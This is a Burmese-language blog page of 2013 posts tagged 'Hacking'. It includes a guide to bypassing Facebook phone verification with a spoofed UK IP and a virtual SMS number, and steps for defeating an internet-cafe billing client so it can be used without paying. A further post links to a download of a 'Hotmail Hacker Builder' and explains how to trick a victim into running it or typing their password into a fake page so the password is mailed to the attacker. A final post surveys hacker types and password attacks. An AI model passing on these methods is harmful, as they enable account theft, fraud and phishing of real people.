စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....
စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....
စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....
စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....
စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Friday, December 13, 2013

Facebook Verify code ကို virtual mobile number နဲ႕ ေျဖနည္းပါ။



ခုတေလာမွာၾကံဳေနရတဲ႕ Facebook ဒုကၡက ေတာ႕ သင္က ခု Facebook ရဲ႔ new security ကိုအာခံျပီးေတာ႕

Step #1: Getting Yourself a UK IP Address
 သင္႕ရဲ႕ UK IP Address ကို UK  ျဖစ္ေအာင္ကို အရင္ဦးဆံုးျပဳလုပ္ရမွာပါ။
တကယ္လို႕တာ UK ကို သြားႏိုင္တယ္ဆိုရင္ေတာ႕ step#3 ကိုတစ္ခါတည္းသြားလုိက္ပါ။
တကယ္ေတာ႕ Facebook က ကိုယ္႕ ရဲ႕   location ကို   location ကို IP ကေနပဲ ၾကည္႕တာပါ။ကိုယ္ဘယ္ IP ကေနျပီးေတာ႕ ကိုယ္႕ account  ကိုဘယ္မွာ  logged in
လုပ္တယ္ဆိုတာကို IP နဲ႕ ပဲၾကည္႕တာပါ။
ျပီးရင္ သူက ႏိုင္ငံရဲ႕ telephone code (+ country code) ကို ထပ္ၾကည္႕တာပါ။
ဒါေၾကာင္႕ ကိုကဘာကို အရင္ဆံုးလုပ္ရမလည္းဆိုေတာ႕ ကိုယ္႕ရဲ႕ IP address ကုိ    UK   IP addressျဖစ္ေအာင္ လုပ္ရမွာပါ။
အင္း အလြယ္ဆံုးနညး္ကေတာ႕  Easy-Hide-IP လုိ႕ေခၚတဲ႕ software  ကို သံုးရမွာဗ်။
ဒါကို သူ႕ရဲ႕မူရင္ဆုိက္ကေနေဒါင္းလုိ႕ရသလို http://depositfiles.com/files/l1uoa85i7 ကေနျပီးေတာ႕ လည္းေဒါင္းလို႕ရပါတယ္။

ျပီးရင္ေတာ႕ software ကို installed လုပ္ျပီးေတာ႕ သင္႕ ရဲ႕  IP address  ကို UK IP address ျဖစ္ေအာာင္အရင္လုပ္ရမွာပါ။ software ေတာ႕ trial ဆိုေတာ႕ 3 ရက္ေတာ႕ သံုးလို႕ရမွပါ။

ခုအေရးအၾကီးဆံုးကေတာ႕ သင္႕  IP address ကိုေနာက္ အဆင္႕ေတြမွာ  UK IP address ေသေသခ်ာခ်ာ ျဖစ္ေနဖို႕ အေရးၾကီးပါတယ္။


Step #2: Verifying Your New Location in Facebook

 သင္႕ ရဲ႕ Facebook  account ကို  log in  ၀င္လုိက္ပါ။ Facebook ကေနျပီးေတာ႕ mobile verification လုပ္ခိုင္းပါလိမ္႕မယ္။
ခု သင္႕ ရဲ႕ location ကို UKအျဖစ္နဲ႕ Facebook ကေနျမင္ေအာင္လုပ္ဖုိ႕ေသခ်ာပါတယ္။
ဒါကိုဘယ္လုိစမ္းရမလဲဆိုေတာ႕ အရင္ဆံုး

Account setting>Security>Active Sessions

ကိုသြားလိုက္ရင္ Logged in from London, ENG, GB “, ဆိုတာကို ျမင္ရရင္ အဆင္ေျပပါျပီ ။မျမင္ရင္ေတာ႕  Step#1 ကိုျပန္သြားရပါမယ္။


Step #3: Creating Free Business E-mail Account

ဒီ အဆင္႕မွာေတာ႕ Step#4 အတြက္ business E-mail account ဘယ္လုိ ဖန္တီးရမလဲဆိုတာကို ေလ႕လာရမွာပါ

တကယ္လို႕သာ သင္႕မွာ  email account ရွိျပီးသားဆုိရင္ေတာ႕ step#4 ကို တုိက္ရိုက္သြားလိုက္ပါ။
 မရွိေသးတဲ႕လူေတြအတြက္ေတာ႕ အရင္ဆံုး sign up လုပ္ၾကရေအာင္ဗ်ာ။ ဥပမာတစ္ခုအေနနဲ႕ကေတာ႕ http://2itb.com အားလံုးအတြက္ပိုျပီးေတာ႕
အဆင္ေျပမယ္လို႕ထင္ပါတယ္။ဖန္တီးၾကည္႕လိုက္ပါ။

ခု  business email account တစ္ခုလုပ္ျပီးျပီဆိုေတာ႕ သင္႕  business email account ကို အစမ္းပို႕ ၾကည္႕ေစရွင္ပါတယ္။ေနာက္အဆင္ေတြ
မွာအဆင္ေျပေစဖုိ႕အတြက္ဆႏၵျပဳခ်င္တာပါ။မလုပ္ခ်င္ရင္လည္းရပါတယ္။

 Step #4: Sending/Receiving Online SMS Using Virtual Mobile Number

ဒီအဆင္႕ကေတာ႕ ေတာ္ေတာ္ေလးကိုအေရးၾကီးတဲ႕ အပို္င္းကိုေရာက္လာျပီးလုိ႕ေတာ႕ ဆုိရမွာပါ။
ဘယ္ေနရာကေနျပီးေတာ႕သင္႕ ရဲ႕  inbox ထဲကေနျပီးေတာ႕ Facebook mobile
verification code ကို message အျဖစ္ ရဖုိ႕ပါပဲ။ကၽြန္ေတာ္ကေတာ႕ေတာ္ေတာ္ေလးကို ရွာလုိက္ရပါတယ္။online ေပၚကေနျပီးေတာ႕
virtual mobile number ကေနျပီးေတာ႕  SMS ကိုဘယ္လုိလက္ခံရရွိမယ္ဆိုတာကိုပါ။ကၽြန္ေတာ္ေတြ႕ရွိတာကေတာ႕
http://www.esendex.co.uk ဆိုတဲ႕ဆိုက္ကိုပါ။


ဒီဆိုက္ကေနျပီးေတာ႕ SMS ကို 25ခု ကို virtual mobile number ကိုသံုးျပီးေတာ႕ ပို႕ႏိုင္၊လက္ခံႏိုင္ပါတယ္။
ဒီမွာလည္းvirtual mobile numberကို ရဖုိ႕အတြက္ကို  free trial ကိုႏွိပ္လုိက္ပါ။ျပီးရင္ေတာ႕ ကိုယ္႕ရ႕ဲ  name,
company name (ကိုယ္႕  business email domain ျဖစ္ဖုိ႕လုိပါတယ္။),
telephone number
 business email address ( step#3မွာ လုပ္ထားတဲ႕ email  ကိုေျပာတာပါ။)
ကၽြန္ေတာ္တစ္ခုေျပာခ်င္တာကေတာ႕ Facebook security check system ျဖစ္တဲ႕  SMS ကို ဒီဆိုက္တစ္ခုတည္းကေနျပီးေတာ႕ လက္ခံရရွိႏိုင္တယ္
လိုေျပာျပခ်င္တာပါ။
ကယ္စရေအာင္ဗ်ာ www.esendex.com ကိုသြားျပီးေတာ႕ logging လုပ္လုိက္ပါ။ျပီးရင္ Send SMS via Echo ကိုႏွိပ္လိုက္ပါ။
အဲဒါဆုိရင္ေတာ႕ သင္ compose & send ဆိုတဲ႕ စာမ်က္ႏွာကိုေရာက္သြားမွာပါ။အဲဒီကေနျပီးေတာ႕
 “Alias” ဆိုတဲ႕ field ကေတာ႕ သင္႕ရဲ႕
virtual mobile number ပဲျဖစ္ပါတယ္။ဒါဆိုရင္ေတာ႕ ကိုယ္႕ရဲ႕  verifyေတာင္းေနတဲ႕ Facebook account ကို verify လုပ္လုိ႕ရျပီးေပါ႔ဗ်ာ။

Step # 5: Verifying Your Account on Facebook

ဒီအဆင္႕ကို ေရာက္လာျပီးဆိုရင္ေတာ႕ သင္႕ အတြက္ဂုဏ္ယူပါတယ္။ ခု Facebook account ကို verify လုပ္လုိ႕ရပါျပီ။ဒါဆိုရင္ကိုယ္႕ရဲ႕
Facebook account ကို Log in ၀င္လုိက္ပါ။

ဒါဆိုရင္ Facebook ကေန security check အေနနဲ႕ verify လုပ္ခိုင္းမွာျဖစ္ပါတယ္။ဒါဆိုရင္ ကိုယ္႕ရဲ႕ virtual mobile number ကို္ထည္႕လုိက္ပါ။
ျပီးရင္ ကိုယ္႕ရဲ႕ www.esendex.com ရဲ႕  inbox  ထဲ ကိုျပန္သြားၾကည္႕လိုက္ပါ။ code ေတြေရာက္ေနတယ္ဆိုတာေတြ႕ရမွာပါ။
ေအာ္ေျပာဖို႕ေမ႕သြားတယ္ virtual mobile number ထည္႕တဲဲ႕ခ်ိန္မွာcountry code အေနနဲ႕ (+44) ျဖစ္ေနဖို႕လုိပါတယ္။မျဖစ္ဘူးဆုိရင္ေတာ႕
step #1 ကိုျပန္သြားရပါဦးမယ္။ေနာက္တစ္ေခါက္ကိုတစ္ဆင္႕ခ်င္းစီျပန္လုပ္ၾကည္႕လုိက္ပါ။



ေနာက္ဆံုးအဆင္႕အေနနဲ႕ေတာ႕  Facebook ထဲကို verification code ထည္႕လုိက္ျပီးေတာ႕ "Continue" ကိုႏွိပ္လုိက္ပါ။ဒါဆိုရင္ေတာ႕
ကၽြန္ေတာ္တို႕ ရဲ႕ verification code ထည္႕တဲ႕နညး္ကို mobile မလိုဘဲနဲ႕ကို လုပ္လုိ႕ရျပီးဆိုတာကို သိလုိက္ရမွာပါ။

အားလံဳးပဲေပ်ာ္ရြင္ၾကပါေစ ....................................            စိုင္းသီဟစိုး
                                                                      http://saitihasoe.blogspot.com/

Tuesday, September 24, 2013

Hacking to Handy cafe Client

ခုကၽြန္ေတာ္ တင္ေပးခ်င္တာကေတာ႕

Hacking to Handy cafe Client
အေၾကာင္းပါ။ဆိုင္မွာသံုးေနေသးတဲ႕ လူေတြခိုးသံုး လုိ႕ရေအာင္တင္ေပး
လိုက္တာပါ ကဲလုပ္ငန္းစလုိက္ရေအာင္။
အရင္ဦးဆံုး *Task manager ကို ဖြင္႕လုိက္ပါ။( Ctrl + Alt + Del )နဲ႕ေခၚလုိ႕ရပါတယ္။ျပီးရင္
*Processes ကိုရွာျပီးေတာ႕ end processလုပ္လိုက္ပါ .

အဲဒါဆိုရင္ Task manager the adminကေနျပီေတာ႕ disabled လုပ္ထားလာမလုပ္ထားဘူးလာသိဖို႕လုိပါတယ္။
Task manager: ကို enable လုပ္ဖို႕အတြက္ ကေတာ႕
*Start
*Run ကိုသြားရမွပါ။ ("gpedit.msc") ကိုရိုက္ထည္႕ေပရမွာပါ။
ျပီးရင္
*User Configuration
*Administrative Templates
*System
*Ctrl+Alt+Del Options
ကို လုပ္လ်ုက္
ျပီးရင္ "Remove Task Manager" ကိုenable လုပ္လုိက္ပါ။


အကယ္၍ Windows XP ဆိုရင္ေတာ႕ registry ကို edit လုပ္ေပးရမွာပါ

အရင္ဆံုးStartကိုသြားျပီးေတာ႕ Runကိုသြားျပီးေတာ႕ regeditရိုက္ထည္႕ျပီးရင္ OK ကိုႏွိပ္လုိက္ပါ။

ျပီးရင္ ေအာက္ကအဆင္႕ေတြကို တစ္ဆင္႕ခ်င္းသြားလုိက္ပါ။

*HKEY_CURRENT_USER
*Software
*Microsoft
*Windows
*CurrentVersion
*Policies
*System
ဒါျပီးျပီဆုိရင္ ေတာ႕
disable Task manager ကိုRight click ႏွိပ္ျပီးေတာ႕ delete ကိုclick လိုက္ပါ။


အကယ္၍ အထက္ပါ ႏွစ္ဆင္႕လံဳးက အလုပ္မလုပ္ဘူးဆိုရင္ေတာ႕ Task manager system fixer ကိုရွာျပီးေတာ႕ download လုိက္ပါ။

အဲဒါျပီရင္ေတာ႕ handycafe ကို software နဲ႕ hack လို႕ရပါျပီ ငိငိ

ကဲအားလံဳး ပဲ စမ္းၾကည္႕လုိက္ၾကပါဦးဗ်ာ
အဆင္ေျပပါ ေစ အားလံုးအားလံုး ကို

Friday, August 30, 2013

Hotmail ဘယ္လိုHacking

ကၽြန္ေတာ့္ကို သူငယ္ခ်င္းေတြ Hotmail ဘယ္လိုHack ရမလဲဆိုတာကို ေမးေနလို႕ ကၽြန္ေတာ္သိတဲ႕နည္းေလးနဲ႕ ပဲ
ေျပာျပလုိက္ပါတယ္။ ခုထိအလုပ္ျဖစ္ေသးလားေတာ႕ကၽြန္ေတာ္လည္း မသိေတာ႕ပါဘူး။ စမ္းၾကည္႕ၾကေပါ႔ ။
ကၽြန္ေတာ္႕ အေကာင္႕ကိုေတာ႕ ခ်မ္းသာေပးပါရင္
ကၽြန္ေတာ္ ေျပာျပမယ္႔ နည္းကေတာ႕ Software သံုးရမွာပါ ။ Software ကိုေတာ႕ေဒါင္းလိုက္ပါ ။
ျပီိးရင္ေတာ႕ ေအာက္ကအဆင္႕ေတြအတိုင္း တစ္ဆင္႕ခ်င္းစီ လိုက္လုပ္သြားလိုက္ပါ ။


၁.ကၽြန္ေတာ္တင္ထားေပးတဲ႕ software RAR ကို အရင္ျဖည္လုိက္ပါ။
၂.ျပီးေတာ႕ Hotmail Hacker Builder.exe ဖိုင္ကို သင္႕ ကြန္ပ်ဴတာေပၚတြင္ Run လိုက္ပါ ။
၃.ျပီးေတာ႕  သင္႕  email address နဲ႕ password ကိုထည္႕ ျပီးေတာ႕ သင္ လိုခ်င္တဲ႕ email ကိုထည္႕လုိက္ပါ။
  ကၽြန္ေတာ္ ဆႏၵျပဳခ်င္တာတစ္ခုရွိပါတယ္။ သင္႕ email address နဲ႕ password ကိုထည္႕မယ္ဆိုရင္
  အေကာင္႕အသစ္တစ္ခုဖြင္႕ျပီးေတာ႕ လုပ္ေစခ်င္ပါတယ္ ။ဘာျဖစ္လည္းဆိုေတာ႕ တစ္ခ်ိဳ႕ Software ေတြက
  သူမ်ားအေကာင္႕ကိုသာလိုခ်င္ျပီးေတာ႕ ကိုယ္႕အေကာင္႕ကိုေပးမွန္းမသိေပးမိေအာင္လုပ္ထားတဲ႕ Software ေတြကပိုေပါေနလို႕ပါ။
  ဒီSoftware ကလဲ အဲလိုဟုတ္လားေတာ႕ ကၽြန္ေတာ္လည္း မေျပာတတ္ဘူး ။ဘာျဖစ္လုိ႕လည္းဆိုေတာကၽြန္ေတာ္လည္း
  ကိုယ္ပိုင္မေရးတတ္ေသးလို႕ပါ။ျပီးေတာ႕ သင္ Gmail နဲ႕  Yahoo mail  ကိုသံုးလို႕ ရပါတယ္။ ဒါေပမယ္႕ Hotmail accountကိုေတာ႕ ေရွာင္ေစခ်င္ပါတယ္။
  ဘာျဖစ္လို႕လည္းဆိုေတာ႕အဲဒီေမးက သင္ Hackခ်င္တဲ႕ password နဲ႕အမ်ိဳးအစား တူေနလို႕ပါ။
  ျပီးေတာ႕ သင္႕ေတာ္တဲ႕ smtp server address ကိုေရြးရမွာပါ။
  အလကားသံုးလို႕ရတဲ႕ smtp server address 587 ကေတာ႕ Gmail ပါပဲ။
  ျပီးေတာ႕ သင္  smtp server addresses  ကို Google မွာလည္းရွာလို႕ရပါတယ္။ serverထိုင္မွသာ သူData ေတြသင္႕ Mail ထဲကိုျပန္ေရာက္ေအာင္ပို႕ႏိုင္မွာျဖစ္သလို
  သင္ေရးမယ္႕ message အတု (fake) ကလည္း အလုပ္လုပ္ လို႕ရမွာပါ ။
  ျပီးေတာ႕  message အတု (fake) ကိုလည္းေရးေပးရမွာပါ ။ ဥပမာ သူ႕ကို Facebook ကေန Sign Up လုပ္ဖို႕ message ပို႕ သလိုမ်ိဳးေပါ႕။ ဒါဆိုရင္သင္႕ (fake)
က Facebook sign up ပံုစံေရးေပရမွာပါ။
၄.ျပီးရင္"Build" ကိုႏိွပ္လိုက္ပါ။ ဒါဆိုရင္သင္ က သင္႕ကိုယ္ပိုင္ Hotmail hacker ကို
  Hotmail hacker ဖိုင္ထဲမွာ ဖန္းတီးျပီးသားျဖစ္မွာပါ။
၅.ျပီိးရင္ ဒီအခ်က္ကေတာ႕ သင္႕အေပၚမွာ အမ်ားၾကီး မူတည္သြားပါျပီ။ ဘာျဖစ္လို႕လည္းဆိုေတာ႕
  သင္ပို႕တဲ႕ဖိုင္ကို သင္႕သားေကာင္က သူ႕ကြန္ပ်ဳတာေပၚမွာ Run ဖို႕လိုလုိ႕ပါ။ Social Engineering နည္းကိုျပန္ျပီးေတာ႕သံုးရမွာပါ။
  တကယ္လို႕သာ သူ႕ကို Run ႏို္င္ေအာင္သာ သင္စည္းရံုးႏုိင္မယ္ဆိုရင္ေတာ႕ သင္ ေအာင္ျမင္ပါျပီ။
   ဒီprogram က သင္လိုခ်င္တဲ႕  hotmail password ကိုရေအာင္စြမ္းေဆာင္ႏို္င္ပါတယ္
၆. ျပီးေတာက သင္ေရးထားတဲ႕ စာမ်က္ႏွာအတု ထဲကို သူ႕ရဲ႕ Hotmail ID နဲ႕ password
   ကိုထည္႕ခိုင္းလိုက္ပါ။ ထည္႕ခ်င္လာေအာင္ ကို ဆြဲေဆာင္ရမွုာေတာ႕ သင္႕ (fake ) ေပၚမွာ မူတည္ပါတယ္။
၇.ဒီအဆင္႕ေရာက္ရင္ေတာ႕ သင္ ႕အေကာင္႕ထဲကို သင္သံုးထားတဲ႕ Sever ကေနျပီးေတာ႕  Email ေရာက္လာပါလိမ္႕မယ္။ သူ႕password
   ပါတဲ႕ email ၊ သူ႕password ရျပီဆိုရင္ေတာ႕ သင္ ဘယ္လိုဆက္လုပ္ရမယ္ဆိုတာ သိေလာက္ျပီထင္ပါတယ္။

ေအာက္ကေနေဒါင္းလိုက္ပါ
Download here:

http://www.mediafire.com/download.php?zjogjlw0ndm

      

Friday, June 14, 2013

Hacker ဆိုသည္မွာ

   ၁။ (က) Hacker ဆိုသည္မွာ

   Hacker ဆိုသည္မွာ Computer System မ်ား၊ Electronic နည္းပညာရပ္မ်ားကို ကၽြမ္းက်င္ တတ္ေျမာက္ၿပီး၊ ထိုနည္းပညာရပ္မ်ားကို အသံုးခ်ကာ Computer Security
 ႏွင့္သက္ဆိုင္ေသာ Program မ်ား၊ Application မ်ားကို ေရးသားသူသာ ျဖစ္သည္ဟူ၍ Hacker Community မွ ယူဆထားၿပီး၊ နည္းပညာရပ္မ်ားကို မသမာေသာ
ရည္ရြယ္ခ်က္မ်ားျဖင့္ အသံုးခ်ေလ့ရွိသူမ်ားကိုမူ Cracker ဟူ၍သာ သတ္မွတ္ေလ့ရွိသည္။

   အၾကမ္းအားျဖင့္မူ White Hat Black Hat ႏွင့္ Grey Hat ဟု ခြဲျခားႏိုင္သည္။ ထို White Hat Black Hat စေသာ အသံုးအႏႈံးမ်ားမွာလည္း ရုပ္ရွင္ဇာတ္ကားမ်ားတြင္
ဦးထုပ္အနက္ေဆာင္းေသာသူသည္ ဇာတ္လုိက္ (လူေကာင္း)၊ ဦးထုပ္အနက္ေဆာင္းေသာသူသည္ လူၾကမ္း (လူမိုက္) စသည္ကို အေၾကာင္းျပဳ၍ကင္ပြန္းတပ္ၾကျခင္းသာ
 ျဖစ္သည္။

   White Hat

   White Hat မ်ားသည္ ၄င္းတို႔၏ နည္းပညာဆိုင္ရာ ကၽြမ္းက်င္မႈမ်ားကို မသမာသည့္လုပ္ရပ္မ်ားတြင္ အသံုးခ်ျခင္း မရွိဘဲ Black Hat မ်ား၏ ေႏွာက္ယွက္ျခင္း
 ခံရေသာသူမ်ားအား ကာကြယ္ ေစာင့္ေရွာက္ေလ့ရွိသူမ်ားဟုဆိုႏိုင္သည္။

   Black Hat

   Black Hat မ်ားမွာမူ ၄င္းတို႔၏ ကၽြမ္းက်င္မႈမ်ားကို မသမာေသာ လုပ္ရပ္မ်ားျဖစ္သည့္ Credit Card Information မ်ား ၊ Bank Information မ်ားခိုးယူျခင္း၊ သူတပါး၏
Website မ်ားကုိ ၀င္ေရာက္ စီးနင္းသိမ္းပိုက္ျခင္း၊ အခေၾကးေငြ ရယူၿပီး သူတပါး၏ ကိုယ္ေရးကိုယ္တာမွတ္တမ္းမ်ား၊ သတင္းအခ်က္အလက္မ်ားကို ခိုးယူေပးျခင္း
စသည့္လုပ္ရပ္ မ်ားကို လုပ္ေဆာင္ေလ့ရွိသူမ်ား ဟု အၾကမ္းအားျဖင့္ သတ္မွတ္ႏိုင္သည္။

   Grey Hat

   Grey Hat မ်ားမွာမူ White Hat အျဖစ္ ေသာ္လည္းေကာင္း၊ Black Hat အျဖစ္ေသာ္လည္းေကာင္း ရပ္တည္ျခင္းမရွိဘဲ ၄င္းတို႔ တတ္ကၽြမ္းထားသည့္ နည္းပညာကို
အလ်ဥ္းသင့္သလို အသံုးခ်သူမ်ား ဟူ၍ ဆိုႏိုင္သည္။

*********************************************************************

   ၁။ (ခ) Hacker အဆင့္အတန္းမ်ား


   Script Kiddies

   Hacker ျဖစ္လိုေသာ လူငယ္မ်ားျဖစ္ၿပီး၊ Hacking ႏွင့္ စပ္လ်ဥ္းသည့္ နည္းပညာမ်ားကို ေလ့လာ သင္ယူျခင္းမရွိဘဲ၊ အျခား Hacker မ်ား ဖန္တီးထားသည့္
Tool မ်ားကို ရယူအသံုးခ်ေလ့ရွိသူမ်ား ျဖစ္သည္။ Hacking Tool မ်ားကို ကၽြမ္းက်င္စြာ အသံုးခ်တတ္ေသာ္လည္း ထို Tool မ်ား မည္သို႔ လုပ္ေဆာင္သည္ကို
မသိရွိ၊ မေလ့လာဘဲ အသံုးခ်သူမ်ားသာျဖစ္သည္။

   Intermediate Hacker

   Computers Networks Programming ႏွင့္သက္ဆိုင္ေသာ နည္းပညာရပ္မ်ားကုိ တတ္ေျမာက္ ေသာ္လည္း ၄င္းနည္းပညာရပ္မ်ားကို လက္ေတြ႔ အသံုးခ်ျခင္းမရွိဘဲ
 အျခားသူမ်ားေရးသားထားသည့္ Exploits ( Software မ်ား၏ လံုျခံဳေရးဆိုင္ရာအားနည္းခ်က္မ်ားကို အသံုးခ်ထိုးႏွက္ၿပီး Computer System ကို
ထိန္းခ်ဳပ္ရန္ ရည္ရြယ္ခ်က္ျဖင့္ ေရးသားထားေသာ Code ) မ်ားကို အသံုးခ်ၿပီး တိုက္ခုိက္မႈမ်ားကို လုပ္ေဆာင္သူမ်ားျဖစ္သည္။

  Elite Hacker

   နည္းပညာၾကြယ္၀ေသာ Hacker မ်ားျဖစ္ၿပီး၊ Hacking Tool မ်ား Exploit မ်ားကို ကိုယ္တိုင္ ေရးသားၿပီး အသံုးျပဳသူမ်ားျဖစ္သည္။
Computer System မ်ားအတြင္းသို႔ မည္သည့္ သဲလြန္စမွ် မက်န္ေစဘဲ ၀င္ေရာက္ႏိုင္စြမ္းရွိသူမ်ားျဖစ္သည္။

****************************************************************************

   ၁။ (ဂ) Hacker တစ္ဦးျဖစ္လာရန္

   ေလ့လာသင္ယူလိုမႈႏွင့္ တီထြင္ဖန္တီးႏိုင္မႈသည္ Hacker တစ္ဦးျဖစ္လာရန္ အတြက္ အေျခခံ အက်ဆံုးႏွင့္ အဓိက အက်ဆံုးေသာ လိုအပ္ခ်က္မ်ားပင္ျဖစ္သည္။

**************************************************



   ၂။ Password အေၾကာင္းသိေကာင္းစရာ

   Computer System မ်ားႏွင့္ Web Based System မ်ား၊ Website မ်ားသည္ လံုျခံဳေရးႏွင့္ ပုဂၢလိကမွတ္တမ္း မ်ားကို ကာကြယ္ရန္အတြက္ Password ကို
အသံုးျပဳေလ့ရွိသည္။ သို႔ေသာ္လည္း Hacker မ်ားသည္ ယင္း Password ျဖင့္ ကာကြယ္မႈမ်ားကို ေက်ာ္လႊားၿပီး မသမာေသာ လုပ္ရပ္မ်ားလုပ္ေဆာင္ျခင္း၊
က်ဴးေက်ာ္ျခင္းစသည့္ လုပ္ရပ္မ်ားကို လုပ္ေဆာင့္ေလ့ရွိၾကသည္။ အခ်ိဳ႕ေသာ Hacker မ်ားသည္ Bank Information ဆိုင္ရာ အခ်က္ အလက္ မ်ားကို ခိုးယူျခင္း၊
ကိုယ္ေရးကိုယ္တာအခ်က္အလက္မ်ားကို ခိုးယူၿပီး ျခိမ္းေျခာက္ျခင္းစသည့္လုပ္ရပ္မ်ားကို လုပ္ေဆာင္ရန္အတြက္ E Mail Password၊ Computer Password
စသည္တို႔ကို ပစ္မွတ္ထားကာခိုးယူေလ့ရွိသည္။

   ေဖာ္ျပမည့္ Password ဆိုင္ရာ အခ်က္အလက္မ်ားအား Password ႏွင့္ဆိုင္ေသာ ျခိမ္းေျခာက္မႈရန္မွ ကာကြယ္ႏိုင္ေစရန္အတြက္သာ ေဖာ္ျပထားျခင္း ျဖစ္ၿပီး၊
အျခားေသာသူမ်ား၏ ကိုယ္ေရးကိုယ္တာ လြတ္လပ္မႈကို က်ဴးေက်ာ္ျခိမ္းေျခာက္ရန္အတြက္ အသံုးမျပဴေစလိုပါ။

   Password ျဖင့္ ကာကြယ္မႈမ်ားကို ေက်ာ္လႊားျခင္း

   Social Engineering

   အျခားေသာသူမ်ား၏ Password ကိုရယူရန္အတြက္ နည္းလမ္းမ်ားစြာရွိသည့္အနက္မွ Social Engineering သည္ အေဟာင္းႏြမ္းဆံုး၊
အရုိးစင္းဆံုးျဖစ္ေသာ္လည္း အသံုး၀င္ဆံုးျဖစ္သည္။ Social Engineering Attack သည္ ယံုၾကည္မႈ၊ သတိကင္းမဲ့မႈ၊ လ်စ္လ်ဴရႈမႈမ်ားစသည့္
အားနည္းခ်က္မ်ားကို အသံုးခ်ကာတိုက္ခိုက္ထိုးႏွက္ျခင္း ပင္ ျဖစ္သည္။

   မၾကာေသးမီကပင္ Twitter Website သည္ Social Engineering ကို အသံုးျပဳ၍ တိုက္ခိုက္က်ဴးေက်ာ္ျခင္းကိုခံခဲ့ရသည္။ ထို႔ျပင္ ထိပ္တန္း Hacker
 ႀကီးျဖစ္ေသာ Kevin Micknick ပင္လွ်င္ Social Engineering Attack ျဖင့္ ထိုးႏွက္ျခင္းကို ခံခဲ့ရသည္။

   ေအာက္တြင္ေဖာ္ျပထားေသာ Social Engineering Attack ဆိုင္ရာ ဥပမာမ်ားမွာ Hacker မ်ား အသံုးျပဳေလ့ရွိသည့္ အနက္မွ အခ်ိဳ႕သာျဖစ္ၿပီး၊
 ၄င္းတို႔သည္ ရုိးစင္းလြန္းလွသည္ဟု ယူဆရေသာ္လည္း ေထာင္ေပါင္းမ်ားစြာေသာ သူတို႔သည္ ဤနည္းမ်ားကို အသံုးျပဳ၍ တိုက္ခိုက္ျခင္းကို ၾကံဳေတြ႔ခဲ့ရၿပီး၊
 ၾကံဳေတြ႔ရဆဲႏွင့္ဆက္လက္ၾကံဳေတြ႕ရ ဦးမည္သာ ျဖစ္သည္။


   Shoulder Surfing Attack

   Shoulder Surfing Attack ဆိုသည့္အတိုင္းပင္ အသံုးျပဳသူ ျဖည့္သြင္းလိုက္ေသာ Password ကို ေခ်ာင္းေျမာင္းၾကည့္ရႈၿပီး ရယူျခင္းပင္ျဖစ္သည္။
 ဤတိုက္ခိုက္မႈကို ကာကြယ္ရန္အတြက္ အေကာင္းဆံုးနည္းမွာ Password ျဖည့္သြင္းစဥ္တြင္ ပတ္၀န္းက်င္ကိုသတိထားၿပီးမွာသာ ျဖည့္သြင္းရန္ျဖစ္ၿပီး၊
ထိုသို႔ တိုက္ခိုက္ျခင္းခံခဲ့ရပါက အေကာင္းဆံုးေသာ တံု႔ျပန္မႈမွာ ေခ်ာင္းေျမာင္းၾကည့္ရႈသူ၏ ေမးရုိးအား ၀ိုက္လက္သီးျဖင့္ ျပင္းထန္စြာထိုးႏွက္ျခင္းပင္ျဖစ္သည္။

   Guessing Attack

   မ်ားေသာအားျဖင့္ အသံုးျပဳသူမ်ားသည္ Password ေရြးခ်ယ္ရာတြင္ မိမိတို႔၏ ေမြးသကၠရာဇ္၊ မွတ္ပံုတင္အမွတ္၊ ရင္ေသြးငယ္မ်ား၏အမည္၊
တယ္လီဖုန္းနံပါတ္ စသည္တို႔ကိုသာ ေရြးခ်ယ္ေလ့ရွိသည္။ ဤသည္ကပင္ တိုက္ခိုက္ရန္အတြက္ အလြယ္ကူဆံုးေသာ၊ အားနည္းမႈအရွိဆံုး
အေျခအေနသို႔ ေရာက္ရွိေအာင္ ကိုယ္တိုင္ေရြးခ်ယ္ဖန္တီးျခင္းပင္ျဖစ္သည္။

   Dictionary Attack

   Dictionary Attack ဆိုသည္မွာ ေရြးခ်ယ္ေလ့ေရြးခ်ယ္ထရွိေသာ Password မ်ားပါ၀င္သည့္ Text File ပါ၀င္သည့္ Programme တစ္ခုကို အသံုးျပဳၿပီး၊
 Password ကို သိမ္းဆည္းထားေသာ Database ႏွင့္ ထို Password File တြင္ပါ၀င္ေသာ Password မ်ားကို တိုက္ဆိုင္စစ္ေဆးကာ Password ကိုရယူျခင္းျဖစ္သည္။
